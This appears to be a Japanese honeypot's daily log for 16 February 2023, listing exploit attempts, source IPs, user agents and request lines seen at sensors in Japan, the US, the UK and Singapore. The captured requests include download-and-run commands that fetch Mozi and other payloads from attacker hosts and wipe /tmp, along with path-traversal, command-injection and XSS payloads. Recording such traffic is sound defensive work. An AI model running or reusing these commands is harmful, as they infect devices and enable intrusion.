2023/02/16 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/02/16分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
fasthttpによるスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 94.158.247.123/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://119.165.32.174:41435/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.cssへのスキャン行為
/.gitへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget  67.198.237.222/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget 103.149.87.111/c0r0n4x.sh;
chmod 777 *;
sh c0r0n4x.sh

Location:UK

5.188.210.227に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Struts 2の脆弱性(S2-008)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
WordPress Pluginの脆弱性を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
5.188.210.227に関する不正通信
Gh0stRATのような動き

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：80 (前日比：-27)
US：総アクセス数：118 (前日比：5)
UK：総アクセス数：63 (前日比：-23)
SG：総アクセス数：148 (前日比：-505)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.113.246.189	United States
2	8.219.181.245	Singapore
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.251	United States
1	45.134.140.181	United Kingdom
2	77.91.78.56	Russia
2	80.85.241.15	Russia
1	92.118.39.82	Romania
7	95.214.235.205	Ukraine
3	101.32.209.199	Singapore
1	103.121.174.6	India
5	109.206.240.201	Bulgaria
2	109.237.97.180	Russia
1	111.92.73.43	India
1	119.165.32.174	China
15	135.125.246.189	France
1	138.68.224.69	United States
1	140.106.26.100	Canada
4	143.244.50.172	United Kingdom
3	159.223.79.226	United States
1	163.125.189.22	China
1	163.172.117.134	United Kingdom
1	167.94.146.58	United States
1	172.104.11.4	United States
1	172.105.128.11	United States
2	172.105.128.12	United States
2	173.249.56.171	Germany
1	180.188.241.101	India
2	183.136.225.32	China
2	185.100.87.136	Seychelles
1	185.180.143.79	Portugal
1	185.254.196.115	Ukraine
1	192.155.90.118	United States
1	198.20.177.235	Canada
1	198.199.93.20	United States
1	205.210.31.132	United States
1	209.141.48.150	United States
1	217.174.245.84	United Kingdom
1	218.28.124.102	China

UserAgent一覧

件数	UserAgent
19	`-`
1	`Hello World`
1	`Hello, World`
2	`Hello, world`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3850.0 Iron Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
5	`QAD1TZ HTTP AGENT`
2	`fasthttp`
1	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01H\x01`
14		`\x16\x03\x01`
26	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`/apis/apps/v1/namespaces/kube-system/daemonsets`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
4	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`/pma/scripts/setup.php`	HTTP/1.0
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//111[.]92[.]73[.]43:45655/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//119[.]165[.]32[.]174:41435/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
3	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/index.htm`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	27.147.235.58	Bangladesh
2	38.242.128.76	United States
1	39.77.68.164	China
1	45.79.128.205	United States
1	45.79.172.21	United States
2	45.79.181.251	United States
1	45.128.232.56	Bulgaria
1	45.134.140.181	United Kingdom
23	51.79.29.48	Canada
1	64.62.197.183	United States
3	64.227.65.93	United States
1	79.137.207.22	Russia
10	85.93.91.96	Germany
1	92.118.39.82	Romania
1	95.111.230.204	Germany
1	101.0.42.114	India
7	103.56.61.147	China
1	103.146.42.206	Bangladesh
1	107.170.239.9	United States
1	107.189.5.161	United States
2	109.237.97.180	Russia
1	125.130.31.244	South Korea
1	138.68.224.69	United States
6	143.244.50.172	United Kingdom
5	152.89.196.211	Russia
2	154.26.136.165	United States
2	162.142.125.210	United States
2	162.142.125.212	United States
1	162.243.140.30	United States
1	172.104.11.46	United States
2	172.104.11.51	United States
1	172.105.128.11	United States
1	172.105.128.13	United States
1	173.249.56.171	Germany
1	175.107.13.178	Pakistan
2	185.246.220.98	Bulgaria
1	190.140.217.108	Panama
1	192.155.90.220	United States
1	193.47.61.76	Bulgaria
1	198.235.24.24	United States
18	206.189.153.197	United States
2	209.141.48.150	United States
1	218.145.61.20	South Korea

UserAgent一覧

件数	UserAgent
32	`-`
22	`Go-http-client/1.1`
1	`Hello World`
1	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0`
1	`Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
6	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`HELP`
1		`MGLNDD_34.68.118.83_80\n`
1		`\x16\x03\x01\x01H\x01`
21		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
28	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
1	GET	`/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=modrcaxy`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/empty/search/results`	HTTP/1.1
1	GET	`/about`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/api/search?folderIds=0`	HTTP/1.1
1	GET	`/apis/apps/v1/namespaces/kube-system/daemonsets`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
6	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/invoker/readonly`	HTTP/1.1
1	GET	`/jenkins/login`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
2	GET	`/manager/html`	HTTP/1.1
2	GET	`/metrics`	HTTP/1.1
1	GET	`/s/3383e2831313e28363e24333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 67.198.237.222/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+;wget+103[.]149[.]87[.]111/c0r0n4x.sh;chmod+777+;sh+c0r0n4x[.]sh`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/users/sign_in`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
2	GET	`/v2/`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`/wp-includes/css/buttons.css`	HTTP/1.1
1	GET	`/wp-login.php`	HTTP/1.1
1	GET	`http[:]//ip-api.com/json/34.68.118.83`	HTTP/1.1
1	GET	`http[:]//ip-api.com/json/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/_ignition/execute-solution`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
3	43.158.217.52	Singapore
2	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.104	United States
2	45.79.181.223	United States
1	45.79.181.251	United States
22	51.79.29.48	Canada
1	63.214.171.26	United States
1	65.49.20.69	United States
1	92.118.39.82	Romania
2	109.237.98.226	Russia
1	120.85.182.103	China
1	120.86.254.71	China
1	138.68.224.69	United States
7	143.244.50.172	United Kingdom
2	152.32.135.202	Hong Kong
2	167.94.145.58	United States
1	172.104.11.46	United States
2	172.105.128.12	United States
1	176.113.115.168	Russia
1	185.180.143.138	Portugal
1	185.246.220.98	Bulgaria
1	192.155.90.118	United States
1	198.199.108.164	United States
1	205.210.31.30	United States
2	209.141.48.150	United States

UserAgent一覧

件数	UserAgent
19	`-`
1	`Go-http-client/1.1`
1	`Hello World`
1	`Hello, World`
1	`Hello, world`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
24	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\t\x01`
12		`\x16\x03\x01`
1		`\xff\xa2\xff`
1		`o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f`
24	GET	`/.env`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
7	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	36.110.214.195	China
2	45.9.110.186	Hong Kong
1	45.79.181.94	United States
2	45.79.181.251	United States
23	51.79.29.48	Canada
1	66.240.205.34	United States
2	77.91.78.56	Russia
2	80.85.241.15	Russia
1	85.9.31.90	Romania
1	92.118.39.82	Romania
1	103.60.60.186	Singapore
1	103.89.14.169	Philippines
2	109.237.97.180	Russia
2	109.237.98.226	Russia
3	134.209.100.79	United States
1	138.68.224.69	United States
7	143.244.50.172	United Kingdom
1	149.56.74.88	Canada
11	152.89.196.211	Russia
54	159.89.166.147	United States
2	162.142.125.8	United States
2	162.142.125.213	United States
3	170.64.169.239	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
2	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.12	United States
1	178.33.221.232	France
1	184.105.247.194	United States
1	185.132.53.119	Germany
1	185.225.74.55	Bulgaria
1	185.246.220.98	Bulgaria
2	192.155.90.118	United States
1	192.155.90.220	United States
1	198.199.97.203	United States
1	205.185.116.69	United States
1	205.210.31.29	United States
2	209.141.48.150	United States
1	211.221.91.207	South Korea
1	220.120.233.247	South Korea

UserAgent一覧

件数	UserAgent
29	`-`
1	`Go-http-client/1.1`
1	`Hello World`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
3	`Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4`
1	`Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025`
3	`Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`curl/7.29.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
2		`\x16\x03\x01\x01H\x01`
19		`\x16\x03\x01`
1	CONNECT	`cipicaoadminpanel[.]xyz:443`	HTTP/1.1
1	GET	`/%255cgoogle.com/evil.html`	HTTP/1.1
1	GET	`/.../.../.../.../.../.../.../.../.../windows/win.ini`	HTTP/1.1
28	GET	`/.env`	HTTP/1.1
1	GET	`//uapi-cgi/certmngr.cgi?action=createselfcert&commonname=anything&country=AA&days=1&local=anything&organization=anything&organizationunit=anything&state=%24(wget%20http[:]//cflfdd6upkq5pdg00010t3rqi5i6fit8n[.]oast[.]live)&type=anything`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/_async/favicon.ico`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_next/../../../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/a/b/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252fetc/passwd`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/api/geojson?url=file:///etc/passwd`	HTTP/1.1
1	GET	`/auth/login?to=/92874%27alert(document.domain)//280`	HTTP/1.1
1	GET	`/backend/backend/auth/signin`	HTTP/1.1
1	GET	`/cgi-bin/.%252e/.%252e/.%252e/.%252e/etc/passwd`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/cgi-bin/stats`	HTTP/1.1
1	GET	`/cgi-bin/status/status.cgi`	HTTP/1.1
1	GET	`/cgi-bin/status`	HTTP/1.1
1	GET	`/cgi-bin/test-cgi`	HTTP/1.1
1	GET	`/cgi-bin/test`	HTTP/1.1
1	GET	`/cgibin/mainfunction.cgi&action=login&keyPath=wget+http%3A%2F%2F87[.]121[.]98[.]34%2Fkk+%3B+chmod+777+kk+%3B+sh+kk&loginUser=a&loginPwd=a`
